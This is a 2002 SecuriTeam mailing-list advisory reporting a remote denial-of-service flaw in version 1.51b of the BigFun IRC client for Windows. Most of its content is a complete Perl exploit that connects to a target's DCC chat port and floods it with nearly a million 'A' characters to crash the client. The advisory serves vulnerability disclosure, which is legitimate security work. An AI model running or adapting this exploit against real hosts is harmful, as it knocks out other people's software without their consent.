[EXPL] BigFun Remote DoS Attack

From: support@securiteam.com
Date: 12/04/02

  • Next message: support@securiteam.com: "[TOOL] WinTCPKill, TCP Connection Killer"
    From: support@securiteam.com
    To: list@securiteam.com
    Date: 4 Dec 2002 11:20:59 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      BigFun Remote DoS Attack
    ------------------------------------------------------------------------

    SUMMARY

    BigFun is an Italian IRC client for Microsoft Windows, if DCC chat is
    established an attacker can cause a Dos to the client by sending him a
    long string.

    DETAILS

    Vulnerable systems:
     * BigFun version 1.51b

    Exploit:
    #########################################################
    # BigFun Version 1.51b Remote DoS attack
    # Exploit by Luca Ercoli luca.ercoli@inwind.it
    #########################################################

    use Socket;

    $host = $ARGV[0];
    $port = $ARGV[1];

    if (!defined($port)) {
    print "Usage: $0 <target> <DCC port>\n";
    exit;
    }

    $iaddr = inet_aton($host) || die "Host Resolve Error.\n";
    $sock_addr = pack_sockaddr_in($port,$iaddr);

    socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n";
    connect(SOCKET,$sock_addr) || die "Connect Error.\n";
    select(SOCKET); $|=1; select(STDOUT);

    $dos = "A" x 999999;

    print SOCKET $dos;

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:luca.ercoli@inwind.it> Luca
    Ercoli.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.